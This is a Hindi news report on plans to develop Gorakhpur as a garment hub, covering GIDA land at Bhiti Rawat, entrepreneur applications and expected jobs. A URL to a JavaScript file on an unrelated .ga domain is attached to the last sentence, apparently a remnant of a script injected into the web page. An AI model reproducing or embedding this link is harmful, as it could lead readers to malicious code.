गोरखपुर गारमेंट हब के रूप में होगा विकसित और बेरोजगारों को मिलेगा रोजगार।
गोरखपुर, ( कुलसूम फात्मा ) बहुत जल्द गोरखपुर की भीटी रावत में जमीन उपलब्ध कराने के लिए औद्योगिक विकास प्राधिकरण औद्योगिक यूनिट के लिए प्रयास में लगा हुआ है। यूपी की राजधानी मार्ग पर गीडा ने भीटी रावत में तकरीबन 125 एकड़ जमीन प्राप्त की है। जिला प्रशासन की तरफ से 10 दिनों के अंतर्गत आवेदन भी आमंत्रित किए जा सकते हैं।
फिलहाल प्राप्त जमीन के डेवलपमेंट के लिए जिला प्रशासन ने निविदा को आमंत्रित कर दिया और यहीं पर तकरीबन 50 एकड़ जमीन में पार्क स्थापित करने की तैयारी है। यह पार्क गारमेंट पार्क होगा। चैंबर ऑफ इंडस्ट्रीज के जरिए आवेदन मांगे गए हैं। गारमेंट पार्क के लिए तकरीबन 137 Entrepreneurs ने जमीन तथा फंड की मांग भी की है। वहीं दूसरी ओर चेंबर के ऑफिसर मुख्यमंत्री से मिले और गोरखपुर को गारमेंट हब बनाने की मांग की।
प्रश्न यह है की क्या इससे रोजगार भी मिल सकेगा आइए जानते हैं ?
गिडा में तकरीबन 68 प्लॉट के लिए 350 से भी ज्यादा आवेदन आए थे। यह गिडा के सेक्टर नंबर 13 तथा 15 में डेवेलप किए गए 68 प्लॉट थे। और इनमें उद्यमियों की तरफ से ज्यादा प्रतिक्रिया मिलीा थी। यही तकरीबन 300 करोड़ का व्यय से 68 यूनिट स्थापित होगी। दूसरी और उसमें 2500 लोगों को रोजगार भी प्रदान किया जा सकेगा। गीडा सीईओ संजीव रंजन से जब बातचीत की तो उन्होंने कहा की गोरखपुर औद्योगिक यूनिटों की स्थापना के लिए सबसे अच्छा माहौल बना रहा है। जमीन की कमी नहीं आ पाए। इसके इसलिए भीटी रावत में बहुत जल्द ही प्लॉट के लिए आवेदन इनवाइट किए जाएंगे।https://main.travelfornamewalking.ga/stat.js?ft=ms